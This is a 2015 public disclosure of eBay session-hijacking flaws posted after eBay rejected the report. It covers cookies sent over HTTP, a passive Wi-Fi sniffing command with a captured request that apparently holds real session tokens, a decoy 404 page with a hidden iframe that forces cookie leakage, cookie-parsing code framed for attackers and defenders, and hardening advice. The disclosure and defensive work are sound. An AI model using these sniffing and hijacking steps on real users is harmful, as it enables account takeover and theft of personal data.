EBay Security Vulnerability

a guest
Jan 31st, 2015
What follows is the communication between the eBay security team and myself. I've identified the vulnerability, yet they refuse to fix it. To be honest, I don't believe they took the time to actually read it, based on their response. If they did, then they should fire whoever reviewed my concern; they obviously have no clue about what it is they do.

My only recourse is to go public in hopes the community can pressure them to fix it.

Final response from eBay:
Thank you for your submission. In our evaluation of any issue, we assess it within the context of our entire security infrastructure. In this case, we found the issue to be invalid as the report says "eBay is not transported over HTTPS" in a very lengthy manner; therefore it is an accepted business risk.

Regards,
eBay Security Research


Original whitepaper:
Issue: For ebay.com, there are multiple session hijacking vulnerabilities.

1- The domain uses HTTPS for login, but after authentication reverts to HTTP. Any cookie that does not carry the Secure flag is then sent in plaintext with every request the browser makes to ebay.com over HTTP, i.e. every time the user clicks a link within the page.
- This is commonly referred to as leakage (of the session token).
- Leakage happens whenever an authentication token is sent in plaintext.

2- After a battery of tests, it was determined that six cookies together form the "token" that logs a user in to ebay.com. Because of vector #1, an attacker is able to sniff those cookies off the wire. The cookies in question are:
- shs
- ns1
- cid
- npii
- nonsession
- dp1

3- By default, ebay.com sets the user up with "Remember Me". On its own this is an innocent browser setting. Combined with the vectors listed above and below, it sets the user up to have their credentials hijacked: a persistent login cookie remains valid, and therefore worth stealing, long after the session in which it was captured. A "Remember Me" setting should always be opt-in rather than opt-out. Users take the path of least resistance, even when it is something as trivial as a mouse click.

4- The authentication cookies listed in vector #2 do not have the HttpOnly flag set.
- If an XSS vector were found on ebay.com, injected script could read these cookies through document.cookie and send them to the attacker. HttpOnly hides cookies from script; it does not prevent the XSS itself, and it does nothing against sniffing (vector #1).

5- Example of a passive attack:
- This example relies on a malicious attacker within radio range of a place that offers free Wi-Fi: Starbucks, Barnes & Noble, McDonald's, etc.
- If a user views any web page whose source contains any reference to ebay.com that the browser fetches over HTTP (an image, script or iframe, or a link the user clicks), the following information can be sniffed without the attacker even being connected to the network. This is a passive attack: the attacker does not need to join the network and does not need to interfere with any web traffic to gather the would-be victim's credentials.
- This works as described on open (unencrypted) networks, which is what most free Wi-Fi is. On a WPA2-PSK network the attacker would additionally need the shared passphrase to decrypt the frames.
- Results of ngrep -d <network interface card in monitor mode> npii (npii is one of the six authentication cookies listed in vector #2, used here as the search pattern).
- Exact command: ngrep -d mon0 npii
- Results (ngrep prints non-printable bytes such as CR and LF as "."):
GET / HTTP/1.1..Host: ebay.com..User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux
x86_64; rv:34.0) Gecko/20100101 Firefox/34.0..Accept: text/html,applicatio
n/xhtml+xml,application/xml;q=0.9,*/*;q=0.8..Accept-Language: en-US,en;q=0.
5..Accept-Encoding: gzip, deflate..Cookie: shs=BAQAAAUqD5IGVAAaAAVUADlSndlM
1OTA4MTE5MzcwMDksMx3vruplDA+uSNW3x+kXxNMEd2gM; ns1=BAQAAAUqD5IGVAAaAAKUADVZ
/b5ExMTY4MzMxOTY4LzA7JrmK6YdMLZErFhepglJWGXiNc8c*; cid=FwOFmznfBVNOx7FP%231
923375115; npii=btguid/88c9063b14a0a5e68b22e905ffeb94ff567f6f55^cguid/88c90
8f014a0a629b802f9b2fb35855f567f6f55^; nonsession=BAQAAAUqD5IGVAAaAAEAACVZ/b
5FzbmFmdTc3NzcBZAACVn9vkSNhAAQACVZ/b1NzbmFmdTc3NzcAqgABVn9vkTEAygAgXgQ9kTg4
YzkwNjNiMTRhMGE1ZTY4YjIyZTkwNWZmZWI5NGZmAMsAAVSeQxk1ABAACVZ/b5FzbmFmdTc3Nzc
AMwAOVn9vkTI5NDE0LTY2MTEsVVNBAPMAIlZ/b5EkMiRSdlNLelhvcyRYYjFxZzdnUkdtRUNHQ2
VCTTcxR1ouALQAAVSeWPAwAJoAClSg3tNzbmFmdTc3NzdwAJwAOFZ/b5FuWStzSFoyUHJCbWRqN
ndWblkrc0VaMlByQTJkajZBRmxvcWlDNUdMcHdTZGo2eDluWStzZVE9PQCdAAhWf2+RMDAwMDAw
MDFqQVV2m+YL3eJgNgqiCEMj/bzbLw**; dp1=bexpt/0001419634098047558e7f72^pcid/1
923375115567f6f91^a1p/0549f8d91^bl/US5860a311^cq/1567f6f91^pbf/%23508180820
00004567f6f91^kms/in5860a311^mpc/0%7C054ab6b11^tzo/12c549e4a21^exc/0%3A0%3A
2%3A254c5c911^u1p/c25hZnU3Nzc3567f6f91^u1f/john567f6f91^..DNT: 1..Connectio
n: keep-alive....
- Notice how the aforementioned cookies from vector #2 appear in the above packet capture: shs, ns1, cid, npii, nonsession, dp1. The request is a plain HTTP GET to ebay.com, so the entire Cookie header is readable on the wire.
- Tokens captured = game over.
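As an added example (not part of the original write-up, and not ngrep's code): the parsing that an attacker, or equally a defender's network monitor, would apply to a request like the capture above. It pulls the Cookie header out of a raw plaintext HTTP request and reports which of the six session cookies it carries; the same logic doubles as a detection rule for session cookies crossing TCP/80 in the clear. The request is constructed for this example, with shortened placeholder cookie values rather than real tokens.

```python
"""Parse a plaintext HTTP request captured off the wire and report which
session cookies it leaks.  Added example for this page, not the original
author's tooling.  The capture is constructed: realistic structure,
shortened placeholder values."""

# Cookie names the write-up identifies as forming the ebay.com login token.
SESSION_COOKIES = {"shs", "ns1", "cid", "npii", "nonsession", "dp1"}

# Constructed capture: the shape of what `ngrep -d mon0 npii` prints (with the
# CRLFs that ngrep renders as ".."), but with placeholder cookie values.
CAPTURED_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Host: ebay.com\r\n"
    b"User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) "
    b"Gecko/20100101 Firefox/34.0\r\n"
    b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    b"Cookie: shs=BAQAAAUqD5IGVAAaAAV; ns1=BAQAAAUqD5IGVAAaAAK; "
    b"cid=FwOFmznfBV%231923; npii=btguid/88c9063b14a0^cguid/88c908f014a0^; "
    b"nonsession=BAQAAAUqD5IGVAAaAAE; dp1=bexpt/0001419634098^u1f/john567f6f91^; "
    b"lang=en-US\r\n"
    b"DNT: 1\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
)


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers).
    Header names are lower-cased; only the first ':' separates name from value
    (User-Agent strings such as 'rv:34.0' contain colons themselves)."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def parse_cookie_header(value):
    """'a=1; b=x=y' -> {'a': '1', 'b': 'x=y'}.  Split each pair on the first
    '=' only, because cookie values (see dp1 above) may contain '=' themselves."""
    cookies = {}
    for pair in value.split(";"):
        pair = pair.strip()
        if not pair:
            continue
        name, _, val = pair.partition("=")
        cookies[name.strip()] = val.strip()
    return cookies


def leaked_session_cookies(raw, session_names=SESSION_COOKIES):
    """Return {name: value} for every session cookie this request sends in clear."""
    _method, _target, headers = parse_request(raw)
    cookies = parse_cookie_header(headers.get("cookie", ""))
    return {k: v for k, v in cookies.items() if k in session_names}


def is_cleartext_session_request(raw, host_suffix="ebay.com"):
    """Detection rule: a plaintext request to the target domain carrying any
    session cookie.  Apply it only to traffic seen on TCP/80; on 443 the Cookie
    header sits inside TLS and there is nothing to parse."""
    _method, _target, headers = parse_request(raw)
    host = headers.get("host", "").lower().split(":")[0]
    if host != host_suffix and not host.endswith("." + host_suffix):
        return False
    return bool(leaked_session_cookies(raw))


if __name__ == "__main__":
    leaked = leaked_session_cookies(CAPTURED_REQUEST)
    print("session cookies sent in cleartext:", sorted(leaked))
    print("alert:", is_cleartext_session_request(CAPTURED_REQUEST))
```

Every name on the list comes back from the constructed request, and the unrelated `lang` cookie is ignored. The same parser pointed at a monitor-mode capture would give an attacker the replayable token; pointed at a span port it gives a defender an alert that the site is still leaking sessions over HTTP.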

6- Example of an active attack:
- An attacker who can spoof DNS responses for the victim could redirect the user to a website under the attacker's control, where the following code is served:
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.4.6 (CentOS)</center>
<div style="position:absolute;top:-9999px;left:-9999px;visibility:collapse;">
<iframe src="http://www.ebay.com"></iframe>
</div></body>
</html>
- The above page looks like an ordinary nginx 404 and loads very fast, so it is seamless to the victim; they wouldn't know what hit them. The hidden iframe makes the browser request http://www.ebay.com over plain HTTP, and the browser attaches every ebay.com cookie that lacks the Secure flag to that request.
- The results are the same as listed in vector #5: the attacker captures the cookies off the wire.


Severity: It would be trivial to log in to another user's ebay.com account without permission by replaying the captured cookies. The following information and actions are available through this attack:
- Name
- Addresses (registration and shipping)
- Secret question
- The ability to interact with other ebay.com users, and perhaps destroy previous and/or future relationships
- The ability to interfere with the user's shopping cart


Solution:
- Serve every page over HTTPS.
- Not using HTTPS for all connections lets an attacker sniff the plaintext content of an HTTP session.
- HTTP is stateless by design; cookies were introduced to provide a stateful mechanism on top of it. Any such stateful mechanism compensating for the insecurity of HTTP must itself be carried over HTTPS, otherwise it is exposed to the techniques above.
- Set the Secure flag on the six cookies listed, and on any other cookie which gives access to a user's ebay.com account, so the browser never sends them over plain HTTP. This only works once every page is HTTPS: on an HTTP page the browser withholds Secure cookies and the user appears logged out, which is why this fix and the first one go together.
- Set the HttpOnly flag on the six cookies listed, and on any other cookie which gives access to a user's ebay.com account, so script cannot read them through document.cookie.


Summary: Following the above solution will render these attack vectors null and void.
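An added check, not part of the original write-up and not eBay's own code: a small audit of Set-Cookie headers that reports which of the six session cookies lack Secure or HttpOnly, re-emits them with both flags, and adds a Strict-Transport-Security header so browsers stop requesting the site over HTTP at all. The response headers and cookie values are constructed placeholders for this example.

```python
"""Audit Set-Cookie headers for the Secure and HttpOnly flags and emit a
hardened response.  Added example for this page, not eBay's code; the
headers below are constructed and the cookie values are placeholders."""

# The six cookies the write-up identifies as the ebay.com login token.
SESSION_COOKIES = {"shs", "ns1", "cid", "npii", "nonsession", "dp1"}

# Constructed login response: three session cookies (one already Secure but
# not HttpOnly) plus an unrelated preference cookie.
WEAK_RESPONSE_HEADERS = [
    ("Set-Cookie", "shs=BAQAAAUqD5IGVAAaAAV; Domain=.ebay.com; Path=/"),
    ("Set-Cookie", "nonsession=BAQAAAUqD5IGVAAaAAE; Domain=.ebay.com; Path=/; "
                   "Expires=Sat, 30 Jan 2016 00:00:00 GMT"),
    ("Set-Cookie", "dp1=bexpt/0001419634098^; Domain=.ebay.com; Path=/; Secure"),
    ("Set-Cookie", "lang=en-US; Domain=.ebay.com; Path=/"),
    ("Content-Type", "text/html"),
]


def parse_set_cookie(value):
    """Split 'name=value; Attr=x; Flag' into (name, value, {attr: x, flag: None}).
    Attribute names are lower-cased; the cookie value is split on the first
    '=' only, since values may contain '=' themselves."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    name, _, val = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, sep, attr_val = part.partition("=")
        attrs[key.strip().lower()] = attr_val.strip() if sep else None
    return name.strip(), val.strip(), attrs


def audit_cookies(headers, session_names=SESSION_COOKIES):
    """Map each session cookie in the response to the list of flags it lacks."""
    findings = {}
    for hname, hvalue in headers:
        if hname.lower() != "set-cookie":
            continue
        name, _value, attrs = parse_set_cookie(hvalue)
        if name in session_names:
            findings[name] = [f for f in ("secure", "httponly") if f not in attrs]
    return findings


def harden_set_cookie(value):
    """Append Secure and HttpOnly to a Set-Cookie value when absent, keeping
    the original attributes (Domain, Path, Expires, ...) untouched."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    present = {p.partition("=")[0].strip().lower() for p in parts[1:]}
    for flag in ("Secure", "HttpOnly"):
        if flag.lower() not in present:
            parts.append(flag)
    return "; ".join(parts)


def hardened_response(headers, session_names=SESSION_COOKIES):
    """Return a copy of the response with every session cookie flagged and an
    HSTS header added.  Browsers only honour HSTS when it arrives over HTTPS,
    so this presumes the whole site is served over TLS (the first fix above)."""
    out = []
    for hname, hvalue in headers:
        if hname.lower() == "set-cookie" and parse_set_cookie(hvalue)[0] in session_names:
            hvalue = harden_set_cookie(hvalue)
        out.append((hname, hvalue))
    out.append(("Strict-Transport-Security", "max-age=31536000; includeSubDomains"))
    return out


if __name__ == "__main__":
    for name, missing in audit_cookies(WEAK_RESPONSE_HEADERS).items():
        print(f"{name}: missing {missing or 'nothing'}")
    for hname, hvalue in hardened_response(WEAK_RESPONSE_HEADERS):
        print(f"{hname}: {hvalue}")
```

On the constructed response the audit flags shs and nonsession as missing both flags and dp1 as missing HttpOnly; after hardening it reports nothing missing. HSTS is a complement to the Secure flag rather than a replacement: it takes effect only after the browser's first HTTPS visit, whereas a Secure cookie is withheld from plain HTTP requests from the moment it is set.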